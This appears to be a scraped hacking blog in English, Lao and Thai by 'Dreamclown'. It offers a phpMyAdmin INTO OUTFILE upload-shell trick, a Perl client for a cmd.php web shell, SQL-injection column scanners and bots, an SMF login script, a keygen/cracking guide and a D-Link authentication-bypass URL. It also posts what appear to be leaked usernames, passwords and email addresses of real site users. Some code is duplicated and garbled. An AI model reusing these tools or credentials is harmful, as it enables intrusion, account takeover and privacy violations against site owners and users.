This p0c is for Crash explorer.exe
http://laoupload.com/UP22PQL6DQFC/p0c.lnk.html
phpMyAdmin Pwn !!
This script is for automatic sql query in phpmyadmin to create upload form in your target site
phpMyAdmin Remote Shell [ by Dreamclown]
Usage : .pl [site+pma path] [upload path] [user] [pass]
+Download Video+Perl Script+Perl Execution (Complied)
-Size : 5.44 MB
SELECT 'upload form blah blah blah...' INTO OUTFILE 'C:/xampp/www/upload.php'
phpMyAdmin Remote Shell [ by Dreamclown]
Usage : .pl [site+pma path] [upload path] [user] [pass]
+Download Video+Perl Script+Perl Execution (Complied)
-Size : 5.44 MB
Perl Bot ສະແກນບັດ SQL Injection ເພື່ອໃຊ້ໃນ Server+VDO
bot ຕົວນີ້ເອົາໃວ້ໃຊ້ສຳຫຼັບທ່ານທີ່ແຮັກ server ມາແລ້ວ (windows ເທົ່ານັ້ນ) ແຕ່ບໍ່ຮູ້ວ່າສິເອົາໄວ້ເຮັດຫຍັງ ເຮົາມີ bot ທີ່ເອົາໃວ້ໃຫ້ scan sql injection ໂດຍໃສ່ list ເວັບໃຫ້ມັນເພື່ອໃຫ້ມັນແຮັກຕາມ list ທີ່ໃຫ້ມານັ້ນ ກໍ່ແລ້ວ ຈາກນັ້ນເຮົາກໍ່ໄປເບີ່ງຜົນການສະແກນເວັບທີ່ມີບັດໃນ log ທີ່ມັນ save ໃວ້
VDO ການນຳໃຊ້ແມ່ນຢູ່ໃນນີ້ນຳເລີຍ
ປລ. perl ຕົວນີ້ complie ມາກ່ອນແລ້ວ :D ເລີຍເປັນ exe ເນາະ
+Watch VDO
+Download VDO
+Download Bot (Perl Complie :D)
Google Dork Finder v2.0 Release [by Dreamclown]
Version 1:
-Change time out as scan site
-Add Filter to
PS. Can't use Dork Ex. inurl,site,allinurl...
Version 1.5:
-Change background to Transparent
-Save To File
-Auto Rank
-Dork List
Version 2.0:
-Add 2 Tab
-Trim Link
-Transparent Mode
-Fix Error Buffer Overflow
-Add Clean Button
by Dreamclown [At] Laohacker[dot]com
+Download Here...!!
Perl SMF Login [by Dreamclown]
#!usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
login_smf("user","password","http://localhost/index.php");
while(1){
}
sub login_smf{
my $user = $_[0];
my $password = $_[1];
my $target = $_[2];
$host = "$target?action=login";
$agent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)';
$ua = LWP::UserAgent->new(agent => $agent,
timeout => 10
);
$res = $ua->get($host);
$phpses = get_setcookie($res->as_string());
$ua->default_header(
'Accept' => "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
'Accept-Charset' => "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
'Keep-Alive' => '115',
'Connection' => 'keep-alive',
'Referer' => "$target?PHPSESSID=" . $phpses . "action=login2",
'Cookie' => "PHPSESSID=$phpses"
);
$host = "$target?PHPSESSID=" . $phpses . "&action=login2";
$res = $ua->post($host,
[
'user' => $user,
'passwrd' => $password,
'cookieneverexp' => 'on',
'hash_passwrd' => ''
]
);
print "===========================================\n";
print "[+] Host : $target\n";
print "[+] Login in $user..\n";
print "[+] Pass in $password..\n";
$ct = $res->content();
$ua->default_header('Cookie' => set_cookie($res->as_string()));
$res = $ua->get($target);
if($res->content() =~m/$user/ig){
print "[+] Success...!\n";
}
else{print "[+] Failed..\n";}
}
sub get_setcookie{
my $var = $_[0];
if($var =~ /Set-Cookie: PHPSESSID=(.+);/){
return $1;
}
}
sub set_cookie{
my $var = $_[0];
my $phpses;
if($var =~m/Set-Cookie: ([^;]+);[^;]+/){
$smf = $1;
$var =~s/Set-Cookie: $1//ig;
}
if($var =~m/Set-Cookie: ([^;]+)/){
$phpses = $1;
}
return $phpses . "; " . $smf;
}
sub readFile{
my @var;
my ($file) = @_;
open FILE, "<:utf8", "$file" or die "[+] Can't open $file : $!"; while(){
my $line = $_;
$line =~ s/\r|\n//g;
next if (length($line) == 0);
push(@var,$line);
}
close FILE;
return(@var);
}
@edkung : มันติดมาอ่ะ หะหะ ของพี่เล็ก windows98se เขืยนน่ะ แถมให้เลย
use LWP::UserAgent;
use HTTP::Cookies;
login_smf("user","password","http://localhost/index.php");
while(1){
}
sub login_smf{
my $user = $_[0];
my $password = $_[1];
my $target = $_[2];
$host = "$target?action=login";
$agent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)';
$ua = LWP::UserAgent->new(agent => $agent,
timeout => 10
);
$res = $ua->get($host);
$phpses = get_setcookie($res->as_string());
$ua->default_header(
'Accept' => "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
'Accept-Charset' => "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
'Keep-Alive' => '115',
'Connection' => 'keep-alive',
'Referer' => "$target?PHPSESSID=" . $phpses . "action=login2",
'Cookie' => "PHPSESSID=$phpses"
);
$host = "$target?PHPSESSID=" . $phpses . "&action=login2";
$res = $ua->post($host,
[
'user' => $user,
'passwrd' => $password,
'cookieneverexp' => 'on',
'hash_passwrd' => ''
]
);
print "===========================================\n";
print "[+] Host : $target\n";
print "[+] Login in $user..\n";
print "[+] Pass in $password..\n";
$ct = $res->content();
$ua->default_header('Cookie' => set_cookie($res->as_string()));
$res = $ua->get($target);
if($res->content() =~m/$user/ig){
print "[+] Success...!\n";
}
else{print "[+] Failed..\n";}
}
sub get_setcookie{
my $var = $_[0];
if($var =~ /Set-Cookie: PHPSESSID=(.+);/){
return $1;
}
}
sub set_cookie{
my $var = $_[0];
my $phpses;
if($var =~m/Set-Cookie: ([^;]+);[^;]+/){
$smf = $1;
$var =~s/Set-Cookie: $1//ig;
}
if($var =~m/Set-Cookie: ([^;]+)/){
$phpses = $1;
}
return $phpses . "; " . $smf;
}
sub readFile{
my @var;
my ($file) = @_;
open FILE, "<:utf8", "$file" or die "[+] Can't open $file : $!"; while(
my $line = $_;
$line =~ s/\r|\n//g;
next if (length($line) == 0);
push(@var,$line);
}
close FILE;
return(@var);
}
@edkung : มันติดมาอ่ะ หะหะ ของพี่เล็ก windows98se เขืยนน่ะ แถมให้เลย
[Perl] - Lyrics.pl
+ มาอีกแล้วคับท่านกับ perl ของผม มาครั้งนี้เป็น perl เอาใว้หาเนื้อเพลงหรือ lyrics
+ ມາອີກແລ້ວກັບ perl ຫາເນື້ອເພງຫລື lyrics
+ Download Here...!!!
+ ມາອີກແລ້ວກັບ perl ຫາເນື້ອເພງຫລື lyrics
+ Download Here...!!!
use LWP::UserAgent; my $ua = LWP::UserAgent->new(agent => 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'); $ua->timeout(10); print "\t\n[+] Song : "; chomp($song =); print "\n[+] $song\n"; $song =~s/\s/\+/ig; my $target = "http://www.lyricstime.com/search/?q=$song&t=default"; $res = $ua->get($target); $ct = $res->content(); if($ct =~m/ /ig)
{
$res = $ua->get("http://www.lyricstime.com/$1");
$ct2 = $res->content();
if($ct2 =~m/([^~]+)
Cmd Shell - Perl
Watch Video you will know about this....

+Perl Cmd Shell
+PHP CMD
+Download Video Here ..!
+Perl Cmd Shell
+PHP CMD
+Download Video Here ..!
#!usr/bin/perl use LWP::UserAgent; my $target = 'http://localhost/cmd.php?cmd='; $ua = LWP::UserAgent->new(); print "dreamclown\@r00t# "; chomp($cmd =); while($cmd !~ "exit"){ if($cmd =~ "cls"){ system("cls"); } else { $s = $target . $cmd; $res = $ua->get($s); $ct = $res->content(); print $ct; } print "\ndreamclown\@r00t# "; chomp($cmd = ); }
[Perl] - Scan Column Part 2
#!usr/bin/perl use LWP::UserAgent; print "\n\tScan Column => [ by Dreamclown ]\n\n"; print "[+] Target : "; chomp($target=); if($target !~/^http:\/\//ig) { $target = "http://$target"; } print "[+] Scan On $target\n"; $browser = LWP::UserAgent->new(); $browser->timeout(10); $order = "+order+by+"; for($i=1;$i<50;$i++) { $target2 = "$target$order$i"; $res = $browser->get($target2); $ct = $res->content(); if($ct =~m/Warning/ig) { $i = $i - 1; print "[+] Column => $i\n"; exit; } }
+ Download Source Code Here..!!
Test Hightlight - Hello World.pl
#!/usr/bin/perl
$age = 26;
@date = (8, 24, 70);
system("cls");
my $a = "Dreamclown";
print $a;
print "\nhello, world\n"; #newline
print "hello, world\t"; #tap
print "\nhello, world\b"; #backspace
print "\nhello, world\a"; #alert
print "\nhello, world\e"; #ESC charecter
print "\nhello, world\033";
print "\nhello, world\x7f"; #DEL charecter
print "\nhello, world\cC"; #CTRL-C
print "\nhello, world\\";
print "\nhello, world\""; #double quote
print "\nhello, worl\ud"; #upper
print "\nhello, worl\lD"; #lowwer
print "\n\Uhello, world"; #all upper
print "\n\LHELLO, WORLD"; #all lowwer
print "\n\Qhello, world";
print "\n\Uhello\E, world\n"; #End \U\L\Q
print $age."\n";
print $date[2] . "\n";
%fruit = (
apples => 3,
oranges => 6
);
($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
print $hour . ":" . $min . ":" . $sec . "\n";
$now = localtime();
print $now . "\n";
if ($a = "Dreamclown"){
print "OK";
}
else{
print "Not OK";
}
unless ($a = "Dreamclown"){
print "\nA";
}
else{
print "\nB";
}
if ($a != "Dreamclown"){ print "\nThat's right..!";}
elsif ($a = "Dreamclown"){ print "\nGood\n"; }
$i = 1;
while ($i < 10){
print $i . "\n";
}
continue{
$i++;
}
for($i = 1;$i < 11;$i++){
print $i . "\n";
}
Default Apache config Path
| Apache Logo |
ServerRoot :: /usr/local/apache2
DocumentRoot :: /usr/local/apache2/htdocs
Apache Config File :: /usr/local/apache2/conf/httpd.conf
Other Config Files :: /usr/local/apache2/conf/extra/
SSL Config File :: /usr/local/apache2/conf/extra/httpd-ssl.conf
ErrorLog :: /usr/local/apache2/logs/error_log
AccessLog :: /usr/local/apache2/logs/access_log
cgi-bin :: /usr/local/apache2/cgi-bin (enabled by default, but the bundled scripts are 644)
binaries (apachectl) :: /usr/local/apache2/bin
start/stop :: /usr/local/apache2/bin/apachectl (start|restart|graceful|graceful-stop|stop|configtest)
Apache httpd 2.0 default layout (apache.org source package):
ServerRoot :: /usr/local/apache2
DocumentRoot :: /usr/local/apache2/htdocs
Apache Config File :: /usr/local/apache2/conf/httpd.conf
SSL Config :: /usr/local/apache2/conf/ssl.conf
ErrorLog :: /usr/local/apache2/logs/error_log
AccessLog :: /usr/local/apache2/logs/access_log
cgi-bin :: /usr/local/apache2/cgi-bin (enabled by default, but the bundled scripts are 644)
binaries (apachectl) :: /usr/local/apache2/bin
start/stop :: /usr/local/apache2/bin/apachectl (start|stop|graceful|configtest)
Debian, Ubuntu (Apache httpd 2.x):
ServerRoot :: /etc/apache2
DocumentRoot :: /var/www
Apache Config Files :: /etc/apache2/apache2.conf
Loadkajai VIP User
[1] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[2] admin:xxxxxxxxxxxxxxxxxxxxxxxxxxxx
[3] keng:dvd123:keng-pattaya@hotmail.com:2
[4] donk_roman:0827694101:roman_2550@yahoo.com:2
[22] hellomaple:6460176:hellomaple@hotmail.com:2
[39] maleficent:phil009:madamlamenta@hotmail.com:2
[45] Poa2553:3552AOp:Dsnsombut@hotmail.com:2
.......
Twista Feat. Chris Brown - Make A Movie
Twista was one of the 100 rappers who they interviewed for the book- !HOW-T0. RAP| The Art&Science of the HipHop MC
My new page "Hacked Zone"
หลังจากที่ได้เห็น blog ของท่าน akira ผมก้อนืกในใจว่าอยากจะทำ page สำหลับเป็นหน้าที่เอาไว้บันทืก web ที่ผมได้เจาะไปแล้วใว้ในนั้น แต่ก้อยังไม่แน่ใจว่าจะดีไม งันผมขอ comment ใว้หน่อยว่าสมควนที่จะทำไม
ຫຼັງຈາກທີ່ໄດ້ເຫັນ blog ຂອງທ່ານ akira ຂ້ອຍກໍ່ນຶກໃນໃຈວ່າຢາກຈະເຮັດ page ສຳລັບເປັນຫນ້າທີ່ເອົາໃວ້ບັນທຶກ web ທີ່ຂ້ອຍໄດ້ເຈາະໄປແລ້ວໃວ້ໃນນັ້ນ ແຕ່ກໍ່ຍັງບໍ່ແນ່ໃຈ ສະນັ້ນເຮົາຂໍ comment ໃວ້ວ່າຈະສົມຄວນເຮັດດີບໍ່
How to Make Keygen - by Edkung [TH]
Requirement
● Ollydbg 1.10 & Plugin ApiBreak (or Other Ollydbg Plugin for Breakpoint Windows API)
● Plugin Code Ripper for copy assembly code from Ollydbg
● Teleport Pro v 1.29 (Build 1107)
● IDE Borland Delphi 7 (or other IDE)
● Read How to crack Teleport Pro
Download Ebook Here
Credit:Edkung
● Ollydbg 1.10 & Plugin ApiBreak (or Other Ollydbg Plugin for Breakpoint Windows API)
● Plugin Code Ripper for copy assembly code from Ollydbg
● Teleport Pro v 1.29 (Build 1107)
● IDE Borland Delphi 7 (or other IDE)
● Read How to crack Teleport Pro
Download Ebook Here
Credit:Edkung
D-Link Router Models Authentication Bypass Vulnerability
========================================================
D-Link Router Models Authentication Bypass Vulnerability
========================================================
# Exploit Title: Multiple D-Link Router Authentication Bypass Vulnerabilities
# Date: 12-01-2011
# Author: Craig Heffner, /dev/ttyS0
# Firmware Link: http://www.dlink.co.uk/
# Firmware Version(s): All
# Tested on: DIR-300, DIR-320, DIR-615 revD
Multiple D-Link routers that use a PHP based Web interface suffer from the same authentication bypass
vulnerability which allows unprivileged users to view and modify administrative router settings.
Further, even if remote administration is disabled this vulnerability can be exploited by a remote
attacker via a CSRF attack.
The vulnerability has been confirmed in the following routers:
DIR-615 revD
DIR-320
DIR-300
The following example URL will allow access to the router's main administrative Web page without authentication:
http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0
For a more detailed description of the vulnerability, see: http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf.
Note that this vulnerability was independently discovered in the DIR-300 and subsequently reported by Karol Celin on 09-Nov-2010 [1].
[1] http://www.securityfocus.com/archive/1/514687/30/120/threaded
D-Link Router Models Authentication Bypass Vulnerability
========================================================
# Exploit Title: Multiple D-Link Router Authentication Bypass Vulnerabilities
# Date: 12-01-2011
# Author: Craig Heffner, /dev/ttyS0
# Firmware Link: http://www.dlink.co.uk/
# Firmware Version(s): All
# Tested on: DIR-300, DIR-320, DIR-615 revD
Multiple D-Link routers that use a PHP based Web interface suffer from the same authentication bypass
vulnerability which allows unprivileged users to view and modify administrative router settings.
Further, even if remote administration is disabled this vulnerability can be exploited by a remote
attacker via a CSRF attack.
The vulnerability has been confirmed in the following routers:
DIR-615 revD
DIR-320
DIR-300
The following example URL will allow access to the router's main administrative Web page without authentication:
http://192.168.0.1/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0
For a more detailed description of the vulnerability, see: http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf.
Note that this vulnerability was independently discovered in the DIR-300 and subsequently reported by Karol Celin on 09-Nov-2010 [1].
[1] http://www.securityfocus.com/archive/1/514687/30/120/threaded
Perl Scan Column SQL injection [ by Dreamclown]
สืกสามานานแล้ว แต่เพี่งมาเล่น perl ครั้งแลกก้อเลยลองเขืยน scan column ของ bug sql injection
ສຶກສາມາດົນແລ້ວ ແຕ່ຫາກໍ່ມາຫຼີ້ນ perl ຄັ້ງທຳອິດເລີຍລອງຂຽນ scan column ຂອງ bug sql injection #!usr/bin/perl
สมัครสมาชิก:
บทความ (Atom)